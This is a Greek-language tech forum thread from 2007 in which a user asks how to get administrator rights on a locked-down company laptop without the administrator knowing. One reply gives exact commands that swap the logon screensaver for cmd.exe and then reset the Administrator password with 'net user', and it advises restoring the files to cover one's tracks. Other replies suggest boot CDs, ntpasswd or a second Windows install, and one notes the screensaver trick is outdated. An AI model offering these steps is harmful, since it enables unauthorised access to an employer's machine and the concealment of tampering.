makis129 Δημοσ. 25 Ιουνίου 2007 Δημοσ. 25 Ιουνίου 2007 Μου εδωσαν ενα laptop απο την εταιρια που δουλευω και ειναι καρακλειδωμενο. Μονο ταινειες μπορω να βλεπω με τα δικαιωματα που εχω. Ουτε δικτυο η/υ στο σπιτι μου μπορω να δω, ουτε εγκατασταση προγραμματος και γενικος ο,τι και να παω να κανω τρωω πορτα. Ειναι πολυ αδικο να εχεις για πρωτη φορα στη ζωη σου ενα φορητο και να καθεσαι απλα να το κοιτας! Υπαρχει τροπος να γινω εστω και για λιγο admin και να φτιαξω ενα δευτερο λογαριασμο (1ος δουλεια, 2ος σπιτι) που να εχει πληρη δικαιωματα; Η εστω να βρω το κλειδι του admin(χωρις να του το πω εννοειται). Ελεγχο δε μας κανουν επομενως ολα οκ αν τα κατεφερω.Στα xp το ειχα καταφερει καποια στιγμη αλλα δε θυμαμαι πως!
Tzimmys Δημοσ. 25 Ιουνίου 2007 Δημοσ. 25 Ιουνίου 2007 Από τον ntg_net στα tips & tricks των windows Κάντε hack στον κλειδωμένο λογαριασμό του Administrator ενός υπολογιστή. Αποκτήστε πρόσβαση σε έναν οποιονδήποτε λογαριασμό χρήστη στον υπολογιστή και ανοίξτε ένα παράθυρο DOS (κλικ στο “Έναρξη” -> “Εκτέλεση” -> Πληκτρολογήστε “CMD”) και γράψτε, ΑΚΡΙΒΩΣ, τις παρακάτω εντολές: Παράθεση: cd\windows\system32 mkdir temphack copy logon.scr temphack\logon.scr copy cmd.exe temphack\cmd.exe del logon.scr rename cmd.exe logon.scr exit Αυτό που μόλις κάνετε, είναι: Μπήκατε στον φάκελο system32. Δημιουργήσατε έναν φάκελο με όνομα temphack. Αντιγράψατε το αρχείο logon.scr μέσα στον φάκελο temphack. Αντιγράψατε το αρχείο cmd.exe μέσα στον φάκελο temphack. Διαγράψατε το αρχείο logon.scr μέσα από το system32. Κάνατε μετονομασία το cmd.exe σε logon.scr Κλείσατε το παράθυρο του DOS. Αποτέλεσμα όλων αυτών των εντολών είναι ότι αντικαταστήσατε το default Screensaver των Windows με το cmd.exe. Στην επόμενη εκκίνηση του υπολογιστή, στην οθόνη επιλογής χρήστη, θα περιμένετε μέχρι να εμφανιστεί το Screensaver, που δεν θα είναι άλλο από μια γραμμή εντολών του DOS, χωρίς καμιά απολύτως προστασία. Αφού ανοίξει το παράθυρο του DOS πληκτρολογήστε την παρακάτω εντολή: net user <όνομα λογαριασμού Administrator> <νέο κωδικό> Αν για παράδειγμα το όνομα του λογαριασμού του Admin είναι “Phantom” και σαν κωδικό θέλετε το “123” τότε γράφετε: net user Phantom 123 Μόλις αλλάξατε τον κωδικό του Admin από οτιδήποτε ήταν, σε 123. ΜΗΝ ξεχάσετε να μεταφέρετε τα αρχεία (cmd.exe, logon.scr) ξανά στον φάκελο system32, έτσι ώστε να καλύψετε τα ίχνη σας.
user-64 Δημοσ. 25 Ιουνίου 2007 Δημοσ. 25 Ιουνίου 2007 ωραιο αυτο κατσε να το αντιγραψω σε κανα txt να το χω :twisted:
louthiros20 Δημοσ. 26 Ιουνίου 2007 Δημοσ. 26 Ιουνίου 2007 to wraio einai kaneis auto pou thes kai den afhni ixnh opws leei pio panw...asto afentiko na balei periorismous....
ntg_net Δημοσ. 26 Ιουνίου 2007 Δημοσ. 26 Ιουνίου 2007 WinInternals or WinPe cd να boutareis και απο κει και περα ευκολα ολα. Βασικα υπαρχουν και αλλοι τροποι αλλα μπορει να τα εχουν κλειδωμενα οποτε παρε 1 απο τα 2 cd για σιγουρα.
makis129 Δημοσ. 26 Ιουνίου 2007 Μέλος Δημοσ. 26 Ιουνίου 2007 Από τον ntg_net στα tips & tricks των windows Πολυ καλο ακουγεται και ειμαι σιγουρος οτι λειτουργει τελεια αλλα το προβλημα ειναι οτι καποια στιγμη (μπορει και σε 1-2 χρονια) θα το παρει ο πραγματικος admin στα χερια του και τοτε θα εχω προβλημα οταν θα δει οτι του εχω αλλαξει το password.
tech25 Δημοσ. 26 Ιουνίου 2007 Δημοσ. 26 Ιουνίου 2007 Από τον ntg_net στα tips & tricks των windows Ο απλος user δεν εχει write δικαιωματα στον φακελο %windir%\system32. Η μεθοδος με to logon.scr ειναι πολυ παλια και αφορουσε NT 4 και 2000 μεχρι καποιο service pack. Σε vista δεν παιζει.
xpapias Δημοσ. 26 Ιουνίου 2007 Δημοσ. 26 Ιουνίου 2007 Ο απλος user δεν εχει write δικαιωματα στον φακελο %windir%\system32. Η μεθοδος με to logon.scr ειναι πολυ παλια και αφορουσε NT 4 και 2000 μεχρι καποιο service pack. Σε vista δεν παιζει. Εγώ έχω ακούσει την ίδια μεθοδο αφού bootάρεις πρώτα με μιά δισκέτα MSDOS. Δοκίμασε το και άν δεν τα καταφέρεις υπάρχουν και άλλοι τρόποι...
activex Δημοσ. 26 Ιουνίου 2007 Δημοσ. 26 Ιουνίου 2007 bale xp se ena allo partition h kai ston idio disko. otan thes na bootaris gia doulia tha to kanis. otan thes gia sena episis tha to kanis. oute alagi pass oute tipota. kai an meta apo 1-2 xronia sto paroun piso to laptop , diagrafis ta xp kai oute gata oute zimia
tech25 Δημοσ. 26 Ιουνίου 2007 Δημοσ. 26 Ιουνίου 2007 Εγώ έχω ακούσει την ίδια μεθοδο αφού bootάρεις πρώτα με μιά δισκέτα MSDOS. Δοκίμασε το και άν δεν τα καταφέρεις υπάρχουν και άλλοι τρόποι... Δεν το δοκίμασα γιατί ξέρω ότι δεν παίζει και δεν μου χρειαζεται. Πληροφοριακά το ανέφερα για τους τυχον ενδιαφερομένους για να μην ταλαιπωρούνται άδικα. Εντελως πληροφοριακα και παλι, η τελευταια εκδοση του ntpasswd (Απριλιος) υποστηριζει και vista.
Προτεινόμενες αναρτήσεις
Αρχειοθετημένο
Αυτό το θέμα έχει αρχειοθετηθεί και είναι κλειστό για περαιτέρω απαντήσεις.